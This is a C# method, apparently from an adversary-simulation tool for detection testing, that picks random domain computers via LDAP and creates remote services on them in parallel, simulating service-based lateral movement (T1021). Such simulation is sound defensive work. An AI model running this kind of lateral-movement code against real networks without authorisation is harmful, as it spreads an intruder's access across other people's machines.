static public void CreateRemoteServiceOnHosts_Old(int nhost, int tsleep, bool cleanup, string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Logger logger = new Logger(currentPath + log);
logger.SimulationHeader("T1021");
logger.TimestampInfo("Using the Win32 API CreateService function to execute this technique");
try
{
var rand = new Random();
int computertype = rand.Next(1, 6);
logger.TimestampInfo(String.Format("Querying LDAP for random targets..."));
List <Computer> targethosts = Targets.GetHostTargets_old(computertype, nhost, logger);
logger.TimestampInfo(String.Format("Obtained {0} target computers", targethosts.Count));
List <Task> tasklist = new List <Task>();
//Console.WriteLine("[*] Starting Service Based Lateral Movement attack from {0} as {1}", Environment.MachineName, WindowsIdentity.GetCurrent().Name);
if (tsleep > 0)
{
logger.TimestampInfo(String.Format("Sleeping {0} seconds between attempt", tsleep));
}
foreach (Computer computer in targethosts)
{
Computer temp = computer;
if (!computer.Fqdn.ToUpper().Contains(Environment.MachineName.ToUpper()))
{
tasklist.Add(Task.Factory.StartNew(() =>
{
LateralMovementHelper.CreateRemoteServiceApi_Old(temp, cleanup, logger);
}));
if (tsleep > 0)
{
Thread.Sleep(tsleep * 1000);
}
}
}
Task.WaitAll(tasklist.ToArray());
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
